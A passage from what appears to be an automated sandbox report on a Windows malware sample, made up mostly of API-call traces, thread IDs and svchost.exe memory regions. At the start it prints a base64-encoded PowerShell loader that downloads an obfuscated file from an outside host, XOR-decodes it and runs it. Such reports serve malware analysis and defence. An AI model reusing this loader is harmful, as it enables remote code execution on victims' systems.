JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAHQAYwBoAGsALQAxAC4AYwBvAG0ALwBkAHIAbwBwADIALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAEEAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBXACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAeAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHkAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB6ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADIANQA1ACkAIAAtAGIAeABvAHIAIAAxADEAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=", lpProcessInformation=0x40f9f0*(hProcess=0x5ac, hThread=0x51c, dwProcessId=0xf88, dwThreadId=0xf8c)) returned 1 [0075.165] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a809b0 | out: hHeap=0x530000) returned 1 [0075.165] CloseHandle (hObject=0x5ac) returned 1 [0075.165] CloseHandle (hObject=0x51c) returned 1 [0075.165] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a5b1e0 | out: hHeap=0x530000) returned 1 [0075.165] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565448 | out: hHeap=0x530000) returned 1 [0075.165] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x556010 | out: hHeap=0x530000) returned 1 [0075.166] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565460 | out: hHeap=0x530000) returned 1 [0075.166] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x567d08 | out: hHeap=0x530000) returned 1 [0075.166] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565478 | out: hHeap=0x530000) returned 1 [0075.166] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552158 | out: hHeap=0x530000) returned 1 [0075.166] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x556030 | out: hHeap=0x530000) returned 1 [0075.166] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x556050 | out: hHeap=0x530000) returned 1 [0075.167] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x542188 | out: hHeap=0x530000) returned 1 [0075.167] GetProcessHeap () returned 0x530000 [0075.167] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551990 | out: hHeap=0x530000) returned 1 [0075.167] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544730 | out: hHeap=0x530000) returned 1 [0075.167] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54e760 | out: hHeap=0x530000) returned 1 [0075.167] GetModuleHandleW (lpModuleName=0x0) returned 0x1230000 [0075.168] GetModuleHandleW (lpModuleName=0x0) returned 0x1230000 [0075.168] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x550168 | out: hHeap=0x530000) returned 1 [0075.169] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x550d40 | out: hHeap=0x530000) returned 1 [0075.169] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-2", hFile=0x0, dwFlags=0x800) returned 0x0 [0075.170] GetLastError () returned 0x7e [0075.170] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x40fa10 | out: phModule=0x40fa10) returned 0 [0075.170] ExitProcess (uExitCode=0x0) [0075.177] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x54e7f0 | out: hHeap=0x530000) returned 1 Thread: id = 2 os_tid = 0xf50 Thread: id = 3 os_tid = 0xf54 Thread: id = 4 os_tid = 0xf58 Thread: id = 5 os_tid = 0xf68 Thread: id = 6 os_tid = 0xf6c Thread: id = 7 os_tid = 0xf70 Thread: id = 8 os_tid = 0xf74 Thread: id = 9 os_tid = 0xf78 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7818000" os_pid = "0x368" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1cc" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d9b2" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 412 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 413 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 414 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 415 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 416 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 417 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 418 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 419 start_va = 0x80000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 420 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 421 start_va = 0xa0000 end_va = 0xa0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 422 start_va = 0xb0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 423 start_va = 0x130000 end_va = 0x196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 424 start_va = 0x1a0000 end_va = 0x1aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "gpsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui") Region: id = 425 start_va = 0x1b0000 end_va = 0x1bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 426 start_va = 0x1c0000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 427 start_va = 0x2c0000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 428 start_va = 0x3c0000 end_va = 0x547fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 429 start_va = 0x550000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 430 start_va = 0x6e0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 431 start_va = 0x7a0000 end_va = 0x7a3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskcomp.dll.mui" filename = "\\Windows\\System32\\en-US\\taskcomp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\taskcomp.dll.mui") Region: id = 432 start_va = 0x7b0000 end_va = 0x7b9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "schedsvc.dll.mui" filename = "\\Windows\\System32\\en-US\\schedsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\schedsvc.dll.mui") Region: id = 433 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 434 start_va = 0x7d0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 435 start_va = 0x7e0000 end_va = 0x7e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 436 start_va = 0x7f0000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 437 start_va = 0x800000 end_va = 0x800fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 438 start_va = 0x810000 end_va = 0x829fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 439 start_va = 0x830000 end_va = 0x830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 440 start_va = 0x840000 end_va = 0x840fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 441 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 442 start_va = 0x860000 end_va = 0x8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 443 start_va = 0x8e0000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 444 start_va = 0x960000 end_va = 0x961fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 445 start_va = 0x970000 end_va = 0x9effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000970000" filename = "" Region: id = 446 start_va = 0x9f0000 end_va = 0x9f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 447 start_va = 0xa00000 end_va = 0xa01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 448 start_va = 0xa10000 end_va = 0xa13fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 449 start_va = 0xa20000 end_va = 0xa2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 450 start_va = 0xa30000 end_va = 0xaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a30000" filename = "" Region: id = 451 start_va = 0xab0000 end_va = 0xadffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000015.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000015.db") Region: id = 452 start_va = 0xae0000 end_va = 0xae7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "vsstrace.dll.mui" filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui") Region: id = 453 start_va = 0xaf0000 end_va = 0xb6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 454 start_va = 0xb70000 end_va = 0xb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 455 start_va = 0xb80000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 456 start_va = 0xc00000 end_va = 0xecefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 457 start_va = 0xed0000 end_va = 0xf35fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 458 start_va = 0xf40000 end_va = 0xf47fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 459 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 460 start_va = 0xfd0000 end_va = 0xfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 461 start_va = 0xfe0000 end_va = 0xfe0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll") Region: id = 462 start_va = 0xff0000 end_va = 0x100ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 463 start_va = 0x1010000 end_va = 0x1012fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wuaueng.dll.mui" filename = "\\Windows\\System32\\en-US\\wuaueng.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wuaueng.dll.mui") Region: id = 464 start_va = 0x1060000 end_va = 0x107bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "firewallapi.dll.mui" filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui") Region: id = 465 start_va = 0x1080000 end_va = 0x108ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001080000" filename = "" Region: id = 466 start_va = 0x1090000 end_va = 0x109ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 467 start_va = 0x10a0000 end_va = 0x10a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010a0000" filename = "" Region: id = 468 start_va = 0x10b0000 end_va = 0x112ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 469 start_va = 0x1130000 end_va = 0x1131fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 470 start_va = 0x1140000 end_va = 0x1140fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 471 start_va = 0x1150000 end_va = 0x115ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 472 start_va = 0x1160000 end_va = 0x1167fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 473 start_va = 0x1170000 end_va = 0x11effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001170000" filename = "" Region: id = 474 start_va = 0x11f0000 end_va = 0x11fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 475 start_va = 0x1200000 end_va = 0x120ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 476 start_va = 0x1210000 end_va = 0x121ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001210000" filename = "" Region: id = 477 start_va = 0x1220000 end_va = 0x122ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 478 start_va = 0x1230000 end_va = 0x123ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "datastore.edb" filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb") Region: id = 479 start_va = 0x1240000 end_va = 0x12bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001240000" filename = "" Region: id = 480 start_va = 0x12c0000 end_va = 0x12c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 481 start_va = 0x12d0000 end_va = 0x12dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 482 start_va = 0x12e0000 end_va = 0x12effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 483 start_va = 0x12f0000 end_va = 0x12f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000012f0000" filename = "" Region: id = 484 start_va = 0x1300000 end_va = 0x130ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 485 start_va = 0x1310000 end_va = 0x131ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 486 start_va = 0x1320000 end_va = 0x139ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 487 start_va = 0x13a0000 end_va = 0x13a5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netcfgx.dll.mui" filename = "\\Windows\\System32\\en-US\\netcfgx.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netcfgx.dll.mui") Region: id = 488 start_va = 0x13b0000 end_va = 0x142ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 489 start_va = 0x1430000 end_va = 0x143ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001430000" filename = "" Region: id = 490 start_va = 0x1440000 end_va = 0x144ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001440000" filename = "" Region: id = 491 start_va = 0x1450000 end_va = 0x145ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001450000" filename = "" Region: id = 492 start_va = 0x1460000 end_va = 0x146ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001460000" filename = "" Region: id = 493 start_va = 0x1470000 end_va = 0x147ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001470000" filename = "" Region: id = 494 start_va = 0x1480000 end_va = 0x148ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001480000" filename = "" Region: id = 495 start_va = 0x1490000 end_va = 0x1490fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshtcpip.dll.mui" filename = "\\Windows\\System32\\en-US\\wshtcpip.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshtcpip.dll.mui") Region: id = 496 start_va = 0x14a0000 end_va = 0x14a0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wship6.dll.mui" filename = "\\Windows\\System32\\en-US\\wship6.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wship6.dll.mui") Region: id = 497 start_va = 0x14b0000 end_va = 0x14b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014b0000" filename = "" Region: id = 498 start_va = 0x14c0000 end_va = 0x14c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 499 start_va = 0x1540000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001540000" filename = "" Region: id = 500 start_va = 0x15e0000 end_va = 0x165ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015e0000" filename = "" Region: id = 501 start_va = 0x1690000 end_va = 0x170ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 502 start_va = 0x1720000 end_va = 0x179ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001720000" filename = "" Region: id = 503 start_va = 0x17a0000 end_va = 0x181ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 504 start_va = 0x1820000 end_va = 0x182ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001820000" filename = "" Region: id = 505 start_va = 0x1830000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001830000" filename = "" Region: id = 506 start_va = 0x1840000 end_va = 0x184ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001840000" filename = "" Region: id = 507 start_va = 0x1850000 end_va = 0x185ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001850000" filename = "" Region: id = 508 start_va = 0x1860000 end_va = 0x186ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001860000" filename = "" Region: id = 509 start_va = 0x1870000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001870000" filename = "" Region: id = 510 start_va = 0x1880000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 511 start_va = 0x1950000 end_va = 0x19cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001950000" filename = "" Region: id = 512 start_va = 0x19f0000 end_va = 0x1a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 513 start_va = 0x1ac0000 end_va = 0x1b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ac0000" filename = "" Region: id = 514 start_va = 0x1b50000 end_va = 0x1bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Region: id = 515 start_va = 0x1c30000 end_va = 0x1d2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 516 start_va = 0x1d30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 517 start_va = 0x1e30000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 518 start_va = 0x1ec0000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ec0000" filename = "" Region: id = 519 start_va = 0x1f60000 end_va = 0x1fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 520 start_va = 0x2020000 end_va = 0x209ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 521 start_va = 0x2100000 end_va = 0x217ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002100000" filename = "" Region: id = 522 start_va = 0x21f0000 end_va = 0x226ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 523 start_va = 0x2280000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 524 start_va = 0x2300000 end_va = 0x23fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 525 start_va = 0x2410000 end_va = 0x248ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 526 start_va = 0x24a0000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 527 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 528 start_va = 0x2650000 end_va = 0x26cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002650000" filename = "" Region: id = 529 start_va = 0x26d0000 end_va = 0x26dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026d0000" filename = "" Region: id = 530 start_va = 0x26e0000 end_va = 0x27dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026e0000" filename = "" Region: id = 531 start_va = 0x2830000 end_va = 0x283ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 532 start_va = 0x28b0000 end_va = 0x292ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028b0000" filename = "" Region: id = 533 start_va = 0x2980000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 534 start_va = 0x2a10000 end_va = 0x2a8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 535 start_va = 0x2ac0000 end_va = 0x2b3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ac0000" filename = "" Region: id = 536 start_va = 0x2b40000 end_va = 0x2bbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b40000" filename = "" Region: id = 537 start_va = 0x2bc0000 end_va = 0x2c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 538 start_va = 0x2ce0000 end_va = 0x2d5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 539 start_va = 0x2d60000 end_va = 0x2e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 540 start_va = 0x2e60000 end_va = 0x305ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e60000" filename = "" Region: id = 541 start_va = 0x3060000 end_va = 0x315ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003060000" filename = "" Region: id = 542 start_va = 0x3170000 end_va = 0x31effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003170000" filename = "" Region: id = 543 start_va = 0x3290000 end_va = 0x32cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003290000" filename = "" Region: id = 544 start_va = 0x32d0000 end_va = 0x330ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032d0000" filename = "" Region: id = 545 start_va = 0x3320000 end_va = 0x339ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 546 start_va = 0x3430000 end_va = 0x34affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 547 start_va = 0x3520000 end_va = 0x359ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 548 start_va = 0x35a0000 